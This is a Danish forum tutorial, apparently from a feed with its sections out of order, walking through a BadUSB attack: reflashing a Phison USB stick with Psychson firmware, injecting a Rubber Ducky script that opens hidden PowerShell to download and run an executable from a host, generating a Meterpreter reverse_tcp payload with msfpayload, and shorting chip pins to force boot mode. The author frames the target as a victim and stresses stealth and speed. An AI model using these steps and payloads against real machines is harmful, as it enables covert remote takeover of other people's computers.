Nu skal vi have fat I et <span style="font-weight: bold;" class="mycode_b">Burner Image</span>, så vi kan <span style="text-decoration: underline;" class="mycode_u">gemme den gamle firmware allerede installeret på vores enhed, samt installere/flashe vores nye firmware efter vi har modificeret den</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Gå ind på</span> <a href="http://www.usbdev.ru/files/phison/" target="_blank" rel="noopener" class="mycode_url">http://www.usbdev.ru/files/phison/</a> og <span style="font-weight: bold;" class="mycode_b">søg</span> (<span style="font-weight: bold;" class="mycode_b">Ctrl + F i Chrome</span>) efter ’<span style="font-weight: bold;" class="mycode_b">Additional Files</span>’.<br />
<span style="font-weight: bold;" class="mycode_b">Tredje resultat</span> vil her give os en <span style="font-weight: bold;" class="mycode_b">liste</span> over <span style="text-decoration: underline;" class="mycode_u">arkiver med firmware filer</span>, og da vi benytter os af <span style="font-weight: bold;" class="mycode_b">PS2251-03 – også kaldet 2303</span>, <span style="text-decoration: underline;" class="mycode_u">downloader vi følgende fil</span>: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Firmware PS2251-03 [BN03*.BIN, FW03*.BIN] {BN – 7 files; FW – 12 files} ; firmware_ps2251-03.rar; size: 787 304 bytes</blockquote>
I <span style="font-weight: bold;" class="mycode_b">firmware_ps2251-03.rar arkivet</span> finder vi filen <span style="font-weight: bold;" class="mycode_b">’BN03V104M.BIN’</span>. <span style="text-decoration: underline;" class="mycode_u">Dette er vores <span style="font-weight: bold;" class="mycode_b">Burner Image</span></span>.<br />
<span style="font-weight: bold;" class="mycode_b">BN</span> – Dette går jeg ud fra er et <span style="text-decoration: underline;" class="mycode_u">prefix for Burner Image</span>.<br />
<span style="font-weight: bold;" class="mycode_b">03</span> – Dette er vores <span style="text-decoration: underline;" class="mycode_u">controller version</span>.<br />
<span style="font-weight: bold;" class="mycode_b">V104</span> – Dette er <span style="text-decoration: underline;" class="mycode_u">versionen</span> på <span style="text-decoration: underline;" class="mycode_u">vores Burner Image</span>.<br />
<span style="font-weight: bold;" class="mycode_b">M</span> – Indikerer at vores <span style="text-decoration: underline;" class="mycode_u">Burner Image er tiltænkt 8K NAND chips</span>. <span style="font-style: italic;" class="mycode_i">(ifølge deres Wiki benyttes dette af alle deres testede USB 3.0 enheder)</span><br />
<br />
Lad os <span style="font-weight: bold;" class="mycode_b">placere filen</span> I vores ’<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Tools</span></span>’ mappe, så vi <span style="text-decoration: underline;" class="mycode_u">ikke behøver at skrive fuld sti når vi skal arbejde med den</span>.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #6</span></span><br />
Nu ville det være smart at <span style="font-weight: bold;" class="mycode_b">gemme vores gamle firmware</span>, både så vi har en <span style="font-weight: bold;" class="mycode_b">backup</span> til hvis det skulle <span style="font-weight: bold;" class="mycode_b">gå galt</span>, men også så vi har <span style="font-weight: bold;" class="mycode_b">firmware der kan patches</span>, <span style="text-decoration: underline;" class="mycode_u">hvis den generede firmware nu ikke virker.</span><br />
I vores <span style="font-weight: bold;" class="mycode_b">kommandovindue fra før</span>, skriver vi <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=SetBootMode</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C:\Users\Balder\Desktop\Psychson-master\tools&gt;DriveCom.exe /drive=G /action=SetBootMode<br />
Action specified: SetBootMode</blockquote>
<br />
Nu er <span style="font-weight: bold;" class="mycode_b">vores enhed</span> sat i <span style="font-weight: bold;" class="mycode_b">Boot Mode,</span> og vi kan nu fortsætte med at <span style="text-decoration: underline;" class="mycode_u">sende vores Burner Image til enheden</span>, ved hjælp af <span style="font-weight: bold;" class="mycode_b">følgende kommando:</span><br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN</blockquote>
<br />
Hvor <span style="font-weight: bold;" class="mycode_b">burner</span> er det <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Burner Image</span> vi hentede før</span>.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C:\Users\Balder\Desktop\Psychson-master\tools&gt;DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN<br />
Action specified: SendExecutable</blockquote>
<br />
Nu er vores<span style="font-weight: bold;" class="mycode_b"> Burner Image</span> så klar til at <span style="text-decoration: underline;" class="mycode_u">dumpe/gemme den gamle firmware fra enheden</span>. Dette klares med <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=DumpFirmware /firmware=GammelFirmware.BIN</blockquote>
<br />
Hvor <span style="font-weight: bold;" class="mycode_b">firmware</span> er <span style="text-decoration: underline;" class="mycode_u">navnet vi ønsker at gemme vores firmware som</span>. I<span style="text-decoration: underline;" class="mycode_u"> dette tilfælde</span> kalder vi det bare ’<span style="font-weight: bold;" class="mycode_b">GammelFirmware.BIN’</span>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Denne fil </span>er nu gemt i vores ’<span style="font-weight: bold;" class="mycode_b">Tools</span>’ mappe.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #7</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Har her valgt at bruge den firmware de har skrevet til formålet, i stedet for at patche filen vi gemte i sidste trin</span>.<br />
I <span style="font-weight: bold;" class="mycode_b">kommandovinduet</span> hopper vi tilbage til <span style="font-weight: bold;" class="mycode_b">Psychson mappen</span>, og herefter ind i <span style="font-weight: bold;" class="mycode_b">firmware mappen</span>.<br />
Dette kan gøres ved <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>cd ../firmware</blockquote>
Nu <span style="font-weight: bold;" class="mycode_b">kører</span> vi så bare <span style="font-weight: bold;" class="mycode_b">build.bat</span> i <span style="text-decoration: underline;" class="mycode_u">samme kommandovindue</span>, og ganske få sekunder efter, vil en <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">række filer</span> være tilgængelige i en ny ’<span style="font-weight: bold;" class="mycode_b">bin</span>’ mappe inde under ’<span style="font-weight: bold;" class="mycode_b">firmware</span>’ mappen</span>.<br />
Inde i ’<span style="font-weight: bold;" class="mycode_b">bin</span>’ mappen <span style="font-weight: bold;" class="mycode_b">kopierer</span> vi en af de nye filer – <span style="font-weight: bold;" class="mycode_b">fw.bin</span> ind i vores ’<span style="font-weight: bold;" class="mycode_b">Tools</span>’ mappe, <span style="text-decoration: underline;" class="mycode_u">så vi igen slipper for at angive sti, og holder det hele samlet.</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #8</span></span><br />
Nu skal vi så have fat i en <span style="font-weight: bold;" class="mycode_b">Rubber Ducky Payload</span>. Disse kan findes i de to links jeg skrev oppe i ’<span style="font-weight: bold;" class="mycode_b">krav</span>’ afsnittet. Jeg vil i denne tekst benytte mig af <span style="font-weight: bold;" class="mycode_b">følgende Payload</span>, som <span style="font-weight: bold;" class="mycode_b">åbner Powershell, WGET’er min RAT Payload, og eksekverer/kører denne</span>. <span style="font-style: italic;" class="mycode_i">(Powershell virker fra Vista og op efter)</span>:<br />
<a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute" target="_blank" rel="noopener" class="mycode_url">https://github.com/hak5darren/USB-Rubber...---execute</a><br />
<blockquote class="mycode_quote"><cite>Citer:</cite>GUI r<br />
DELAY 100<br />
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"<br />
ENTER</blockquote>
<br />
Der dog også findes i en lidt anderledes udgave, som <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">gemmer Powershell vinduet</span>, så det bliver lidt mere ’<span style="font-weight: bold;" class="mycode_b">stealth</span>’</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>GUI r<br />
DELAY 100<br />
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"<br />
ENTER</blockquote>
<br />
Da jeg benytter mig af en <span style="font-weight: bold;" class="mycode_b">lokal server på netværket</span>, ændrer jeg <span style="font-weight: bold;" class="mycode_b">ovenstående URL</span> i vores Ducky Script til <span style="text-decoration: underline;" class="mycode_u">dennes lokale IP</span> - <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://192.168.0.106/bob.old" target="_blank" rel="noopener" class="mycode_url">http://192.168.0.106/bob.old</a></blockquote>
<br />
Dette script skal så <span style="font-weight: bold;" class="mycode_b">encodes til binær form</span>, så det kan <span style="font-weight: bold;" class="mycode_b">sammenkædes med vores enheds firmware</span>. Dette kan gøres <span style="font-weight: bold;" class="mycode_b">online</span> på <a href="http://www.ducktoolkit.com/Encoder.jsp" target="_blank" rel="noopener" class="mycode_url">http://www.ducktoolkit.com/Encoder.jsp</a> - Her skal vores script bare <span style="font-weight: bold;" class="mycode_b">kopieres ind</span> og <span style="font-weight: bold;" class="mycode_b">Keyboard Layout skiftes til Denmark</span>. Så trykker vi på ’<span style="font-weight: bold;" class="mycode_b">Generate Script</span>’, og herefter <span style="font-weight: bold;" class="mycode_b">’Download .bin</span>’. <span style="text-decoration: underline;" class="mycode_u">Dette downloader en fil ved navn ’<span style="font-weight: bold;" class="mycode_b">inject.bin</span>’, som indeholder vores encoded script. </span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kopier eller flyt</span> <span style="text-decoration: underline;" class="mycode_u">denne fil</span> over i din <span style="font-weight: bold;" class="mycode_b">tools</span> mappe, så vi kan fortsætte med at sammenkæde den med vores firmware (<span style="font-weight: bold;" class="mycode_b">fw.bin</span>) fil.<br />
<span style="font-weight: bold;" class="mycode_b">I vores tidligere</span> – eller i et nyt <span style="font-weight: bold;" class="mycode_b">kommandovindue</span> skal vi nu <span style="text-decoration: underline;" class="mycode_u">tilbage til vores '<span style="font-weight: bold;" class="mycode_b">tools</span>' mappe</span>. Dette kan lige som før gøres ved <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>:<br />
 <blockquote class="mycode_quote"><cite>Citer:</cite>cd ../tools</blockquote>
 - <span style="font-weight: bold;" class="mycode_b">Eller</span> ved at åbne et <span style="font-weight: bold;" class="mycode_b">nyt kommandovindue</span> ved at <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">holde shift inde</span>, <span style="font-weight: bold;" class="mycode_b">højreklikke på mappen</span> og vælge '<span style="font-weight: bold;" class="mycode_b">åbn kommandovindue her</span>'.</span><br />
Her vil vi bruge <span style="font-weight: bold;" class="mycode_b">injector.exe</span> til at <span style="text-decoration: underline;" class="mycode_u">injicere</span> vores <span style="text-decoration: underline;" class="mycode_u">Ducky Payload</span> (<span style="font-weight: bold;" class="mycode_b">inject.bin</span>) ind i vores <span style="text-decoration: underline;" class="mycode_u">firmware</span> (<span style="font-weight: bold;" class="mycode_b">fw.bin</span>) fil.<br />
<span style="text-decoration: underline;" class="mycode_u">Sørg for at begge filer er gemt i</span> <span style="font-weight: bold;" class="mycode_b">tools</span> mappen, og <span style="font-weight: bold;" class="mycode_b">kør følgende kommando</span>: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>injector.exe inject.bin fw.bin</blockquote>
For at sikre os, at vores<span style="font-weight: bold;" class="mycode_b"> firmware nu også er bevet injiceret</span>, kan vi tjekke <span style="font-weight: bold;" class="mycode_b">filens timestamp</span>. Hvis denne <span style="text-decoration: underline;" class="mycode_u">stemmer over ens</span> med <span style="font-weight: bold;" class="mycode_b">systemets klokkeslæt</span>, <span style="text-decoration: underline;" class="mycode_u">så ved vi at der er blevet arbejdet på filen</span>.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #9</span></span><br />
Nu skulle alt være klart til at vi kan <span style="font-weight: bold;" class="mycode_b">flashe</span> den <span style="font-weight: bold;" class="mycode_b">nye firmware</span> til <span style="font-weight: bold;" class="mycode_b">vores enhed</span>. <br />
<span style="text-decoration: underline;" class="mycode_u">Så længe vi ikke har haft frakoblet vores enhed fra USB porten</span>, skulle vi nu kunne køre <span style="font-weight: bold;" class="mycode_b">følgende kommando</span> for at <span style="text-decoration: underline;" class="mycode_u">sende den nye firmware til enhden og installere den ved hjælp af vores tidligere <span style="font-weight: bold;" class="mycode_b">Burner Image</span></span>:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">burner</span> er samme <span style="font-weight: bold;" class="mycode_b">Burner Image</span> som vi <span style="text-decoration: underline;" class="mycode_u">benyttede tidligere</span>.<br />
<span style="font-weight: bold;" class="mycode_b">firmware</span> er vores <span style="text-decoration: underline;" class="mycode_u">genererede og modificerede firmware</span>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">(Hvis du har haft enheden [b]frakoblet</span> eller noget andet er <span style="font-weight: bold;" class="mycode_b">gået galt</span>, så brug den tidligere kommando til at ændre enheden til <span style="font-weight: bold;" class="mycode_b">Boot Mode</span> igen)</span>[/b]<br />
<br />
Nu skulle vores nye firmware være installeret på enhden, og være klar til brug.<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Næste trin går ud på at generere en Meterpreter Payload, så hvis du har en anden fil kan du springe dette over.</span></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #10</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Bob.old</span> er den<span style="text-decoration: underline;" class="mycode_u"> fil vi ønsker at eksekvere på vores offers maskine</span>.<br />
Det kan være alle former for eksekverbare filer, såsom en <span style="font-weight: bold;" class="mycode_b">DarkComet server</span> eller bare <span style="font-weight: bold;" class="mycode_b">Notepad</span> hvis der skal testes.<br />
Vil som så mange andre gange benytte mig af en <span style="font-weight: bold;" class="mycode_b">Meterpreter Payload</span>, for at gøre <span style="font-weight: bold;" class="mycode_b">præsentationen lidt realistisk</span>. Denne payload genererer jeg ved hjælp af Metasploit, som i dette tilfælde kører på Kali, men også findes til Windows. Med <span style="font-weight: bold;" class="mycode_b">Kali</span> kørende åbner jeg en ny <span style="font-weight: bold;" class="mycode_b">konsol/terminal</span> og indtaster <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">følgende kommando og parametre</span></span>:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=9191 X &gt; /root/Desktop/bob.old</blockquote>
Hvor <span style="font-weight: bold;" class="mycode_b">msfpayload</span> er <span style="font-style: italic;" class="mycode_i">modulet der genererer vores payload ud fra de givne parametre</span><br />
<span style="font-weight: bold;" class="mycode_b">LHOST</span> er vores <span style="text-decoration: underline;" class="mycode_u">Lokale værtscomputer, og skal pege på maskinen der skal modtage forbindelsen fra offerets computer.</span><br />
<span style="font-weight: bold;" class="mycode_b">LPORT</span> er <span style="text-decoration: underline;" class="mycode_u">porten værtscomputeren og offerets computer skal bruge til at oprette forbindelse og kommunikere.</span><br />
<span style="font-weight: bold;" class="mycode_b">windows/meterpreter/reverse_shell</span> er payload typen. For at se de forskellige payloads kan vi skrive '<span style="font-weight: bold;" class="mycode_b">show payloads</span>'. <span style="font-style: italic;" class="mycode_i">Meterpreter er ekstremt effektiv, og kan også genereres i en HTTPS version der krypterer kommunikationen ved hjælp af SSL.</span><br />
<span style="font-weight: bold;" class="mycode_b">X &gt; bob.old</span> specificerer <span style="text-decoration: underline;" class="mycode_u">placeringen samt filnavn på hvor vi vil gemme den genererede binære data til</span>. <span style="font-style: italic;" class="mycode_i">Gemmer den bare på skrivbordet, og flytter den over til min maskine der kører XAMPP. Man kan også bare gemme filen til /var/www - og herefter køre etc/init.d/apache2 start' for at hoste filen på vores <span style="font-weight: bold;" class="mycode_b">Kali maskine</span> og efterfølgende starte <span style="font-weight: bold;" class="mycode_b">Apache</span>. Hvis man vælger at gøre dette, skal <span style="font-weight: bold;" class="mycode_b">URL</span> selvfølgelig pege på <span style="font-weight: bold;" class="mycode_b">denne IP</span></span>.<br />
<br />
Her er et eksempel på hvordan det kan se ud. <span style="font-weight: bold;" class="mycode_b">Dette passer dog ikke til ovenstående, da det er taget fra en af mine andre tåde</span>:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_53_44.png" alt="[Billede: Screenshotfrom2014-08-1916_53_44.png]" class="mycode_img" /><br />
<br />
Da jeg bruger <span style="font-weight: bold;" class="mycode_b">Meterpreter </span>skal jeg også opsætte en <span style="font-weight: bold;" class="mycode_b">handler</span> til at modtage <span style="font-weight: bold;" class="mycode_b">indgående forbindelser</span>. Her bruger jeg <span style="font-weight: bold;" class="mycode_b">Metasploits handler</span>, hvor<span style="font-weight: bold;" class="mycode_b"> LHOST</span> <span style="font-style: italic;" class="mycode_i">peger på IP adressen som skal modtage offerets forbindelse</span>, og <span style="font-weight: bold;" class="mycode_b">LPORT</span>, som er <span style="text-decoration: underline;" class="mycode_u">porten der skal sørge for de forbinder og kan kommunikere.</span><br />
<br />
<span style="color: #4682B4;" class="mycode_color">[size=x-largel]Nu har vi opsat vores <span style="font-weight: bold;" class="mycode_b">Firmware, Ducky Payload, Meterpreter Payload</span> (<span style="font-style: italic;" class="mycode_i">hosted på en lokal server</span>) og vores<span style="font-weight: bold;" class="mycode_b"> handler</span>.<span style="font-weight: bold;" class="mycode_b"> Hvis vi stikker enheden i USB-porten får vi et resultat i stil med første postede Youtube video</span></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #FF6347;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Hardware introduceret Boot Mode</span></span><br />
<br />
<span style="color: #FF6347;" class="mycode_color">Hvis vi nu ønsker at installere firmware IGEN, kan vi godt løbe ind i det problem, at vi ikke kan skifte enheden til BootMode ved hjælp af den tilhørende DriveCom software. </span><br />
<span style="font-weight: bold;" class="mycode_b">Hvis dette er tilfældet</span>, kan vi være nødsaget til at starte enheden op i <span style="font-weight: bold;" class="mycode_b">Boot Mode</span>, ved at <span style="font-weight: bold;" class="mycode_b">kortslutte specifikke stifter på chippen</span>.<br />
Dette billede bruger de selv i deres <span style="font-weight: bold;" class="mycode_b">doc mappe på Github</span> til at vise <span style="font-weight: bold;" class="mycode_b">hvor disse stifter er tilstede på deres</span> <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Patriot 8GB Supersonic Xpress</span></span> <span style="font-weight: bold;" class="mycode_b">enhed</span>:<br />
<br />
<img src="https://raw.githubusercontent.com/adamcaudill/Psychson/master/docs/PinsToShortUponPlugInForBootMode.jpg" alt="[Billede: PinsToShortUponPlugInForBootMode.jpg]" class="mycode_img" /><br />
<br />
I mit tilfælde bruger jeg en <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">SanDisk Ultra 16Gb USB 3.0</span></span>, <span style="text-decoration: underline;" class="mycode_u">og der sidder stifterne således</span>:<br />
<br />
<img src="http://anony.ws/i/2014/10/22/IMAG0905.jpg" alt="[Billede: IMAG0905.jpg]" class="mycode_img" /><br />
<br />
<img src="http://anony.ws/i/2014/10/22/IMAG0906.jpg" alt="[Billede: IMAG0906.jpg]" class="mycode_img" /><br />
<br />
Alt man skal gøre er at bruge en <span style="font-weight: bold;" class="mycode_b">metalgenstand såsom en nål eller kniv</span> til at <span style="font-weight: bold;" class="mycode_b">røre stifterne</span><span style="text-decoration: underline;" class="mycode_u"> før og imens man tilslutter enheden</span>. <span style="font-style: italic;" class="mycode_i">Dette kan godt være halv-svært at gøre uden et USB kabel</span>, <span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">men det er stadig muligt</span></span>. <br />
<span style="font-weight: bold;" class="mycode_b">Hold genstanden mod stifterne</span> <span style="text-decoration: underline;" class="mycode_u">før enheden bliver sat i USB porten</span>, og <span style="text-decoration: underline;" class="mycode_u">ca. et minuts tid</span> efter den er <span style="font-weight: bold;" class="mycode_b">registreret</span> og<span style="text-decoration: underline;" class="mycode_u"> LED lyset er blivende</span>. <span style="text-decoration: underline;" class="mycode_u">Hvis LED lyset blinker, har du ikke kortsluttet stifterne korrekt</span>.<br />
<span style="text-decoration: underline;" class="mycode_u">Hvis lyset derimod bliver ved med at lyse</span>, så skulle enheden <span style="text-decoration: underline;" class="mycode_u">igennem dens hardware</span> være i <span style="font-weight: bold;" class="mycode_b">Boot Mode</span> igen, og trinnene kan gennemgåes igen. Da vi kan <span style="font-weight: bold;" class="mycode_b">generere firmware og Ducky Payloads </span><span style="text-decoration: underline;" class="mycode_u">uden brug af enheden</span>, er det sådan set <span style="font-weight: bold;" class="mycode_b">kun ved firmware flashing/installation dette trin skal gennemgåes</span>.<br />
<br />
<span style="font-style: italic;" class="mycode_i">Desuden er det ikke alle enheder der er lige lette at åbne</span>, og ved mine <span style="font-weight: bold;" class="mycode_b">Sandisk Ultra</span> <span style="font-weight: bold;" class="mycode_b">blev jeg nødt til at skrælle dem godt og grundigt fra deres plastikhylstre:</span></span><br />
<br />
<img src="http://anony.ws/i/2014/10/22/IMAG0907.jpg" alt="[Billede: IMAG0907.jpg]" class="mycode_img" /><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #FF0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">Vær opmærksom på, at deres firmware ikke reagerer på Flash chippen, så med denne firmware virker enheden ikke som USB-stik / Oplagringsenhed mere.</span></span></span><br />
<br />
<br />
Tak til Malcolm for lån af en af hans Youtube brugere. ;)]]></description>
			<content:encoded><![CDATA[Synes lige vi skulle tage et kig på BadUSB, så længe det stadig er rimelig nyt for de fleste, og ikke en angrebsmåde man kender til i den brede offentlighed Uden for IT-verdenen. De fleste ville selvfølgelig være lidt suspekte over en fremmed, ja selv en velkendt person, som stikker et USB stik i ens Computer. Det gode er her, at angrebet kan klares ’håndfrit’, og alt der kræves er et minut – man behøver ikke engang kigge på skærmen.<br />
Vi vil kun kigge på ét af de 3 firmware modificeringer som Psychson er stand til at køre på nuværende tidspunkt.<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="color: #1E90FF;" class="mycode_color">Lad os starte ud med en kort video (1 minut) af mit resultat af denne test:<br />
<iframe width="560" height="315" src="https://www.youtube.com/embed/2AAd3e-p3w0" frameborder="0" allowfullscreen></iframe><br />
- Vær opmærksom på, at min Meterpreter Payload ikke fylder meget, samt er hostet lokalt, så større eksterne filer kan tage længere tid om at blive downloadet ned på offerets PC.<br />
- Du kan også vælge at gemme Powershell vinduet, men for bedre at demonstrere angrebet har jeg valgt ikke at gøre dette.<br />
- Valgte at køre sidste Shell kommando for at vise, at vores Payload kører og er funktionel selv efter enheden er frokoblet (Giver sig selv)</span></span><br />
<br />
<span style="color: #FF4500;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">&lt;Hov Da&gt;<br />
- Har skrevet dette uden retstavning på en Linux maskine, så der er nok rigeligt med fejl at rette. Ting som store I'er og tastefejl.<br />
- Det ser forfærdeligt rodet ud, så må lige få bikset en video sammen.<br />
- Ville også gerne have haft billeder med af diverse kommandoers Output, men der er begrænsning på antal billeder pr. post, så det bliver lige kopieret output i stdet - på et tidspunkt.<br />
- Undskylder på forhånd musikken i baggrunden. Ville have haft klippet alt lyden fra.<br />
- Skriver også lidt langsomt efter der er forbindelse, men sad med en bærbar mere i skødet jeg ikke ville tabe, og mobilen i højre. Så der er lige et par sekunder der kunne have været undværet.<br />
- Kvaliteten er heller ikke for god på en ældre HTC model så sent om aftenen, men har et bedre kamera til rådighed.<br />
- Hov. Der var vidst også begrænsning af indlejrede vidoer.<br />
&lt;/Hov Da&gt;</span></span></span><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvad er BadUSB</span> - En beskrivelse af BadUSB<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #32CD32;" class="mycode_color">Krav</span></span> - Krav til at få denne type angreb til at virke<br />
<span style="font-weight: bold;" class="mycode_b">Trin #1</span> - Installation af SDCC<br />
<span style="font-weight: bold;" class="mycode_b">Trin #2</span> - Server til hosting af Meterpreter Payload<br />
<span style="font-weight: bold;" class="mycode_b">Trin #3</span> - Kompilering af værtøjer<br />
<span style="font-weight: bold;" class="mycode_b">Trin #4</span> - Test af chip og firmware version<br />
<span style="font-weight: bold;" class="mycode_b">Trin #5</span> - Anskaffelse af Burner Image<br />
<span style="font-weight: bold;" class="mycode_b">Trin #6</span> - Backup af enhedens gamle firmware<br />
<span style="font-weight: bold;" class="mycode_b">Trin #7</span> - Compilering af den specialbyggede firmware<br />
<span style="font-weight: bold;" class="mycode_b">Trin #8</span> - Encoding af Rubber Ducky Payload<br />
<span style="font-weight: bold;" class="mycode_b">Trin #9</span> - Flashing og installering af ny firmware<br />
<span style="font-weight: bold;" class="mycode_b">Trin #10</span> - Opsætning af Meterpreter Payload<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FF6347;" class="mycode_color">Hardware introduceret Boot Mode</span></span> - Der kan opstå problemer med at flashe nyt firmware efter første fimware er installeret. Det kan ordnes ved at kortslutte stifterne på NAND-chippen <br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FF0000;" class="mycode_color">Advarsel</span></span> - Enheden vil ikke fungere som traditionelt USB-stik mere<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Hvad er BadUSB?</span></span><br />
BadUSB er en fælles betegnelse for USB enheder, der er modificerede til at afvige fra deres normale egenskaber, og herved opføre sig som andre typer enheder, for eksempel netværkskort – eller i dette tilfælde et HID (Human Interface Device) Keyboard. Dette opnåes ved brug af skræddersyet firmware. <br />
<br />
Her er den originale Talk af <span style="font-weight: bold;" class="mycode_b">Karsten Nohl og Jakob Lel</span>l - fra <span style="font-weight: bold;" class="mycode_b">Black Hat 2014</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://www.youtube.com/watch?v=nuruzFqMgIw" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=nuruzFqMgIw</a></blockquote>
<br />
<span style="text-decoration: underline;" class="mycode_u">Desværre har disse herre valgt at holde deres modificerede firmware tæt på kroppen, og de har i skrivende stund endnu ikke offentliggjort denne.</span><br />
<br />
Her har vi så en Talk fra<span style="font-weight: bold;" class="mycode_b"> DerbyCon 4,</span> hvor <span style="font-weight: bold;" class="mycode_b">Adam Caudill og Brandon Willson</span> gennemgår <span style="text-decoration: underline;" class="mycode_u">Deres projekt omhandlende BadUSB</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://www.youtube.com/watch?v=xcsxeJz3blI" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=xcsxeJz3blI</a></blockquote>
<span style="font-weight: bold;" class="mycode_b">Denne gang blev deres firmware delt offentligt på deres Github, til stor glæde for os andre ;)</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/adamcaudill/Psychson/" target="_blank" rel="noopener" class="mycode_url">https://github.com/adamcaudill/Psychson/</a></blockquote>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #32CD32;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Windows Maskine</span></span> – Til at køre deres firmware værktøjer.<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Visual Studio/C++</span></span> - Til at kompilere disse med (Har kompileret og uploadet disse filer til: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://s000.tinyupload.com/index.php?file_id=02302254012118188682" target="_blank" rel="noopener" class="mycode_url">http://s000.tinyupload.com/index.php?fil...2118188682</a></blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Small Device C Compiler</span></span> - <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://sdcc.sourceforge.net/" target="_blank" rel="noopener" class="mycode_url">http://sdcc.sourceforge.net/</a> </blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Psychson Firmware + Værktøjer</span></span>: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/adamcaudill/Psychson/" target="_blank" rel="noopener" class="mycode_url">https://github.com/adamcaudill/Psychson/</a></blockquote>
 - Git-clone eller download de samlede filer som et .zip arkiv<br />
<br />
